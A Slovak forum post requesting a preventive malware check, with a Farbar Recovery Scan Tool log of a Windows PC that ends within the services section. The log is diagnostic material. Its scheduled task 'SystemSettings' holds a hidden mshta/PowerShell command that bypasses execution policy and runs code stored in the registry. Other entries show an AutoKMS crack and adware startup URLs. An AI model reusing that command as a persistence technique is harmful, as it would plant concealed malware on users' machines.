Prosim o preventivnu kontrolu
Napsal: 23 říj 2020 09:48
Dobry den, prosim o preventivku. PC slape v poriadku, ale nastal cas (ako u zubara).
FRST
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 19-10-2020
Ran by Tomika (administrator) on TOM (Gigabyte Technology Co., Ltd. Z87-HD3) (23-10-2020 10:44:48)
Running from C:\Users\Tomika\Desktop
Loaded Profiles: Tomika
Platform: Windows 8.1 Pro (Update) (X64) Language: English (United Kingdom)
Default browser: Chrome
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(A FOUR TECH CO., LTD. -> ) C:\Program Files (x86)\Bloody7\Bloody7\Bloody7.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated -> Adobe Systems Inc.) D:\Programy\Adobe\Acrobat\Acrobat\acrotray.exe
(Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Autodesk, Inc -> Autodesk Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
(Cole Williams Software Limited -> ) C:\Windows\SysWOW64\Codecs\TrayMenu.exe
(CrypKey (Canada) Ltd.) [File not signed] C:\Windows\System32\Crypserv.exe
(Epic Games Inc. -> Epic Games, Inc.) D:\Programy\Epic Games\Launcher\Engine\Binaries\Win64\UnrealCEFSubProcess.exe
(Epic Games Inc. -> Epic Games, Inc.) D:\Programy\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
(Even Balance, Inc. -> ) C:\Windows\SysWOW64\PnkBstrA.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <50>
(Intel(R) pGFX -> ) C:\Windows\System32\igfxTray.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxHK.exe
(IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\Driver Booster\7.2.0\Pub\PreCare.exe
(Manhattan Engineering Incorporated -> Kite) C:\Program Files\Kite\kited.exe
(Manhattan Engineering Incorporated -> Kite) C:\Program Files\Kite\KiteService.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <2>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Oxygen Cloud Inc. -> ) C:\Users\Tomika\.odrive\bin\6729\odriveapp.exe
(Oxygen Cloud Inc. -> odrive) C:\Users\Tomika\.odrive\bin\6729\odrive.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Samsung Electronics Co., Ltd. -> Samsung Electronics Co. Ltd.) C:\Program Files (x86)\Samsung\Samsung Magician\SamsungMagician.exe
(Stichting Blender Foundation -> Blender Foundation) C:\Program Files\Blender Foundation\Blender 2.90\blender.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) D:\Programy\TeamViewer\TeamViewer_Service.exe
(Wacom Technology Corp. -> Wacom Technology) C:\Program Files\Tablet\Wacom\WacomHost.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_Tablet.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TabletUser.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TouchUser.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
(Wondershare software CO., LIMITED -> Wondershare) C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\WsAppService.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\nvspcap64.dll [1893496 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3402832 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [18391120 2019-03-31] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [WindowsDefender] => "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [File not signed]
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [ADSKAppManager] => C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe [711616 2016-04-19] (Autodesk, Inc -> Autodesk, Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => D:\Programy\Adobe\Acrobat\Acrobat\Acrotray.exe [3499896 2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2383040 2016-10-12] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [653728 2018-03-26] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [Codec Settings UAC Manager] => C:\Windows\SysWOW64\Codecs\CodecUACManager.exe [66192 2018-03-20] (Cole Williams Software Limited -> )
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [GalaxyClient] => [X]
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [EpicGamesLauncher] => D:\Programy\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [32546704 2020-10-23] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [91701608 2020-07-30] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [Bloody2] => C:\Program Files (x86)\Bloody7\Bloody7\Bloody7.exe [19841264 2020-02-13] (A FOUR TECH CO., LTD. -> )
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [Kite] => C:\Program Files\Kite\kited.exe [625822184 2020-10-14] (Manhattan Engineering Incorporated -> Kite)
HKLM\...\Print\Monitors\Adobe PDF Port Monitor: C:\Windows\system32\AdobePDF.dll [55432 2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe [2020-10-21] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodecPackTrayMenu.lnk [2018-06-11]
ShortcutTarget: CodecPackTrayMenu.lnk -> C:\Windows\SysWOW64\Codecs\TrayMenu.exe (Cole Williams Software Limited -> )
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\odrive.lnk [2017-07-27]
ShortcutTarget: odrive.lnk -> C:\Program Files\odrive\odrive.exe (Oxygen Cloud, Inc -> ) [File not signed]
GroupPolicy: Restriction - Chrome <==== ATTENTION
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0291BC3E-5758-4AE0-B583-887997C4F7E5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-05-02] (Google Inc -> Google Inc.)
Task: {08667DDA-529A-4AE5-B93A-F3FB2AFB6863} - System32\Tasks\npcapwatchdog => C:\Program Files\Npcap\CheckStatus.bat [862 2019-04-30] () [File not signed]
Task: {14E9279D-E202-421D-9345-9FF6FF65892A} - System32\Tasks\AutoKMS => D:\Programy\MS Office\KMS_tooltip_crack\AutoKMS.exe
Task: {19B48E07-EF07-43C1-89F3-DC0C7BE14F95} - System32\Tasks\CCleanerSkipUAC => D:\Programy\CCleaner\CCleaner.exe [26588344 2020-09-08] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {240525CC-07E9-4C0E-BF92-7FD8CBC01AAC} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\7.2.0\Scheduler.exe [149776 2019-11-14] (IObit Information Technology -> IObit)
Task: {2AE7DBC0-9D7B-4633-9F38-EA13D59FFC97} - \Movie\Movie task -> No File <==== ATTENTION
Task: {2C5BAA6C-22CE-4023-8CD3-920F648F948D} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [436856 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {3B6DA161-FF75-4709-9698-E8B4D4E29F7A} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {521E2DEE-AF47-458B-BE39-05E41D7000C3} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\SamsungMagician.exe [1112576 2017-05-19] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co. Ltd.)
Task: {56E7C739-D87C-4968-A298-0FA8DD870A67} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {57E8FD86-D77A-4957-AF8A-185FF714EF38} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [495224 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {5DFEF0DB-1EC0-4858-9DE9-295F0928B552} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1195544 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Task: {5FBDD006-E7EF-4EB4-B15F-E75C13219037} - System32\Tasks\SystemSettings => mshta vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -WindowStyle hidden -ep bypass -nop -c $e=(Get-ItemProperty HKLM:\Software\WOW6432Node\a);Select-Object -ExpandProperty Shell;Invoke-Expression $e",0,True)(window.close)
Task: {67CAE894-9940-43DF-A154-A01C69C48B7F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-05-02] (Google Inc -> Google Inc.)
Task: {69904E5D-AA09-4F07-8269-73B550B28214} - System32\Tasks\JavaUpdateSched => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [653728 2018-03-26] (Oracle America, Inc. -> Oracle Corporation)
Task: {7354C34F-FF87-4E86-89AB-F2B6844E5835} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [1693816 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {8116AA3D-F35E-4EE1-A65F-61E452CB28B9} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_445_pepper.exe [1497656 2020-10-13] (Adobe Inc. -> Adobe)
Task: {8623AE83-BCCD-4DB0-BE84-45A87C9A0D5E} - System32\Tasks\CCleaner Update => D:\Programy\CCleaner\CCUpdate.exe [686384 2020-09-08] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {AF11B0C8-2370-4BF1-A148-2AC2A2B5F4A3} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [649336 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {B669C2DF-0043-43E2-BD6E-2B93975B0C19} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3402832 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {BBB840E0-DF47-4533-842A-614A9FB55DB2} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {C5600166-0D00-436C-9597-BB2E48267804} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-10-13] (Adobe Inc. -> Adobe)
Task: {D9E3F3C1-96EA-408C-93C5-EAB8CC220326} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [728184 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {E3339F51-E6A0-4320-BFB4-20947A367484} - System32\Tasks\MEGA\MEGAsync Update Task S-1-5-21-2643689781-145595849-2857803826-1001 => C:\Users\Tomika\AppData\Local\MEGAsync\MEGAupdater.exe [615160 2019-04-14] (Mega Limited -> Mega Limited)
Task: {E43C15E6-6414-4ACA-846C-D124676E2AD8} - System32\Tasks\Driver Booster SkipUAC (Tomika) => C:\Program Files (x86)\IObit\Driver Booster\7.2.0\DriverBooster.exe [7749904 2019-12-19] (IObit Information Technology -> IObit)
Task: {E83C055E-EA00-442C-83F5-A1DF6B84C917} - System32\Tasks\Driver Booster Update => C:\Program Files (x86)\IObit\Driver Booster\7.2.0\AutoUpdate.exe [2361104 2019-12-18] (IObit Information Technology -> IObit)
Task: {EDF106E5-69AB-49FB-9A36-0AF6F148BFCB} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [728184 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {FA8EF300-7063-437D-9ECE-A3820122D686} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [649336 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {FB2E7073-3061-4C88-848B-30215EF82E06} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [946296 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.81.1 213.46.172.38 213.46.172.39
Tcpip\..\Interfaces\{1F7EB040-CEB2-48F8-A98A-A024DE0DE62A}: [DhcpNameServer] 192.168.81.1 213.46.172.38 213.46.172.39
Edge:
======
Edge Profile: C:\Users\Tomika\AppData\Local\Microsoft\Edge\User Data\Default [2020-07-01]
FireFox:
========
FF DefaultProfile: 006jgses.default
FF ProfilePath: C:\Users\Tomika\AppData\Roaming\Mozilla\Firefox\Profiles\006jgses.default [2020-10-21]
FF Session Restore: Mozilla\Firefox\Profiles\006jgses.default -> is enabled.
FF Extension: (AdBlocker Ultimate) - C:\Users\Tomika\AppData\Roaming\Mozilla\Firefox\Profiles\006jgses.default\Extensions\adblockultimate@adblockultimate.net.xpi [2020-10-20]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - D:\Programy\Adobe\Acrobat\Acrobat\Browser\WCFirefoxExtn
FF Extension: (Adobe Acrobat - Create PDF) - D:\Programy\Adobe\Acrobat\Acrobat\Browser\WCFirefoxExtn [2017-01-04] [Legacy] [not signed]
FF Plugin: @java.com/DTPlugin,version=13.0.1.0 -> C:\Program Files\Java\jre-10.0.1\bin\dtplugin\npDeployJava1.dll [2018-05-18] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=13.0.1.0 -> C:\Program Files\Java\jre-10.0.1\bin\plugin2\npjp2.dll [2018-05-18] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-10-12] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2019-02-12] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @wolfram.com/Mathematica -> C:\Program Files (x86)\Common Files\Wolfram Research\Browser\11.0.1.5597552\npmathplugin.dll [2016-09-21] (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FF Plugin-x32: Adobe Acrobat -> D:\Programy\Adobe\Acrobat\Acrobat\Air\nppdf32.dll [2014-08-05] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-10-12] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [No File]
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default [2020-10-23]
CHR Notifications: Default -> hxxps://calendar.google.com; hxxps://web.skype.com; hxxps://www.messenger.com
CHR HomePage: Default -> hxxp://www.seznam.cz/?clid=13415
CHR StartupUrls: Default -> "hxxp://feed.helperbar.com/?p=mKO_AwFzXIpYRa0T-NJ1bNV5iGB7j76kR7EOZGkeQkbUBtqSnxy0q4qOqRPdLMQ5814Ip_0Bcs96ceKxOJ3yAx3ac2A20wh1BTmHSKoac3d5DU0PKrFavIAzFxl1cPGixbg440pQsLkCnd8sKH-Ln2Ju87vPmwn5rVbntl2zC3PO29IJVaQ5afAlJNtFeJI,","hxxp://www.google.com/","hxxp://d2ucfwpxlh3zh3 ... mode=loadm"
CHR NewTab: Default -> Active:"chrome-extension://jpfpebmajhhopeonhlcgidhclcccjcik/newtab.html"
CHR Session Restore: Default -> is enabled.
CHR Extension: (Flash Video Downloader) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\aiimdkdngfcipjohbjenkahhlhccpdbc [2020-10-09]
CHR Extension: (ColorZilla) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\bhlhnicpbhignbdhedgjhgdocnmhomnp [2019-04-02]
CHR Extension: (Mendeley Web Importer) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\dagcmkpagjlhakfdhnbomgmjdpkdklff [2020-10-09]
CHR Extension: (Adobe Acrobat) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2020-09-16]
CHR Extension: (Video Downloader professional) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\elicpjhcidhpjomhibiffojpinpmmpil [2020-07-26]
CHR Extension: (News Feed Eradicator for Facebook) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjcldmjmjhkklehbacihaiopjklihlgg [2020-10-21]
CHR Extension: (Vysor) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\gidgenkbbabolejbgbpnhbimgjbffefm [2020-09-04]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2020-10-16]
CHR Extension: (Google Kalendář) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmbgaklkmjakoegficnlkhebmhkjfich [2020-06-11]
CHR Extension: (Toby for Chrome) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\hddnkoipeenegfoeaoibdmnaalmgkpip [2020-10-15]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2020-10-23]
CHR Extension: (Google Keep – poznámky a seznamy) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmjkmjkepdijhoojdojkdfohbdgmmhki [2020-10-23]
CHR Extension: (Obvibase: an online database editor) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\hoddinokjifhganfcgkjmkkngljebjdj [2020-09-02]
CHR Extension: (WhatFont) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\jabopobgcpjmedljpbcaablpmlmfcogm [2019-04-02]
CHR Extension: (Speed Dial 2 New tab) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpfpebmajhhopeonhlcgidhclcccjcik [2020-04-16]
CHR Extension: (Auto Replay for YouTube™) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\kanbnempkjnhadplbfgdaagijdbdbjeb [2019-11-25]
CHR Extension: (Grammarly for Chrome) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen [2020-10-21]
CHR Extension: (Any.do Extension) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdadialhpiikehpdeejjeiikopddkjem [2019-04-02]
CHR Extension: (Zoom for Google Chrome) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\lajondecmobodlejlcjllhojikagldgd [2020-08-14]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2020-10-12]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-03]
CHR Extension: (Any.do) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\ocgddccilgpeepgglnlpchkpgamkgmld [2019-04-02]
CHR Extension: (Chrome Media Router) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-10-08]
CHR Profile: C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\System Profile [2019-06-09]
CHR HKU\S-1-5-21-2643689781-145595849-2857803826-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - D:\Programy\Adobe\Acrobat\Acrobat\Browser\WCChromeExtn\WCChromeExtn.crx [2014-05-08]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AdAppMgrSvc; C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe [1262096 2016-04-19] (Autodesk, Inc -> Autodesk Inc.)
R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [83984 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
S3 AdobeFlashPlayerUpdateSvc; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-10-13] (Adobe Inc. -> Adobe)
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-10-12] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3739728 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3511376 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 CrypKey License; C:\Windows\system32\crypserv.exe [126976 2010-03-18] (CrypKey (Canada) Ltd.) [File not signed]
S3 GalaxyClientService; C:\Program Files (x86)\GOG Galaxy\GalaxyClientService.exe [1636936 2020-03-21] (GOG Sp. z o.o. -> GOG.com)
S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [6821960 2020-03-21] (GOG Sp. z o.o. -> GOG.com)
